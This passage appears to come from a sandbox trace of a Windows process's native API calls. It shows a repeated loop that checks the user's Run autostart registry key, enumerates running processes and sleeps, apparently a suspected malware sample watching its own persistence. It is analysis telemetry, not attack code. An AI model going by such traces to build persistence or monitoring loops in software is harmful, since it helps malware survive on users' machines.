(ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.465] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.478] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.478] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.479] NtClose (Handle=0x154) returned 0x0 [0180.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.483] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.492] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.493] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.493] NtClose (Handle=0x154) returned 0x0 [0180.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.497] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.508] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.508] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.508] NtClose (Handle=0x154) returned 0x0 [0180.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.513] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.538] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.538] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.538] NtClose (Handle=0x154) returned 0x0 [0180.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.543] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.555] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.555] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.555] NtClose (Handle=0x154) returned 0x0 [0180.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.557] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.560] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.570] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.570] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.571] NtClose (Handle=0x154) returned 0x0 [0180.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.579] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.593] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.593] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.593] NtClose (Handle=0x154) returned 0x0 [0180.593] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.598] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.618] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.618] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.618] NtClose (Handle=0x154) returned 0x0 [0180.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.619] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.622] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.634] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.634] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.634] NtClose (Handle=0x154) returned 0x0 [0180.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.638] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.648] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.648] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.648] NtClose (Handle=0x154) returned 0x0 [0180.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.652] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.652] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.664] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.664] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.664] NtClose (Handle=0x154) returned 0x0 [0180.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.668] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.680] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.681] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.681] NtClose (Handle=0x154) returned 0x0 [0180.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.685] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.695] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.695] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.695] NtClose (Handle=0x154) returned 0x0 [0180.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.696] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.699] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.711] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.711] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.711] NtClose (Handle=0x154) returned 0x0 [0180.711] 